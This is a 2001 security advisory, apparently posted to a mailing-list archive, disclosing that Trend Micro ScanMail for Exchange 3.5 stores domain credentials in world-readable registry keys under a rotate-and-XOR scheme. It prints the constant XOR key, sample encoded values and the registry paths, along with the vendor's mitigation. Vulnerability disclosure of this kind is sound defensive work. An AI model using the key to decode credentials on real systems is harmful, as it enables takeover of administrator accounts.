OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Maucher, Jon (jmaucherHARRIS.COM)
Date: Fri Mar 30 2001 - 13:49:58 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ================================================================================
    ==
                                STAT Security Advisory
                               http://www.statonline.com/

    Software Vendor: Trend Micro (www.antivirus.com)
    Software Package: ScanMail for Exchange
    Versions Affected: 3.5 Evaluation (possibly others)
    Synopsis: Account names and passwords stored unprotected
                                    in registry
    Issue Date: March 30, 2001

    Vendor Response: Vendor notified March 1, 2001
                            Solution received March 5, 2001
                            Vendor fix notification received March 29, 2001
    ================================================================================
    ==

    1. Summary

    Trend Micro's ScanMail for Exchange (version 3.5) stores the credentials of
    users
    in the system registry with no protection. These credentials apply to the NT
    domain,
    and include a valid NT domain or system username, the NT domain name, and
    password.
    This occurs in at least two places, once when the product is installed and
    once for use by the Management Console. Since both installation and management
    require administrative privileges, the administrative account for the system
    or for the entire domain can be compromised.

    2. Problem Description

    Several registry values are created during installation and during use
    of the product's Management Console to store the credentials of the
    last user to log on. These credentials are valid at least on the server,
    and possibly valid on the entire domain depending on the last user to log in.
    Additionally, these keys are created with Everyone set to Special Access,
    which includes the ability to read the values. The usernames and passwords
    are rolled right a number of characters and then XOR'ed with a constant key
    (0xB15A0E707EEDEB80F70FB78F1399).

    For example, if the Administrators password is "test", then one of the following
    values would be stored:

    C53F7D04
     -or-
    3F7D04C5
     -or-
    7D04C53F
     -or-
    04C53F7D

    The result is a possible administratative compromise of a system (or quite
    possibly
    an entire domain).

    3. Solution

    Trend Micro recommends, as a temporary fix, that the following keys (and all
    sub-keys)
    should have their permissions set to Full Control for Administrators and SYSTEM
    (remove all other permissions):

    HKLM\Software\TrendMicro\ScanMail for Exchange\RemoteManagement
    HKLM\Software\TrendMicro\ScanMail for Exchange\UserInfo

    The vendor is implementing a new encryption method that will be
    available in version 5.1 of ScanMail for Exchange.

    4. Credits

    This vulnerability was discovered and researched by Jon Maucher
    and Bill Wall of Harris Corporation.

    ----------------------------------------------------------------------------
    Delivery co-sponsored by BindView Corporation
    ============================================================================
    Are your security practices adequate enough to protect you from hackers and
    crackers? How do you provide remote access to your users, enable e-mail
    messaging, Internet sites and e-commerce activity, and at the same time
    maintain security? Can you implement and administer the effective security
    measures you need without doing battle with the people who need access to
    your network?

    Download FREE the latest Hurwitz Group Report, Management Controls:
    Security Impact of IT Administration at <http://www.bindview.com/hurwitz3>
    ----------------------------------------------------------------------------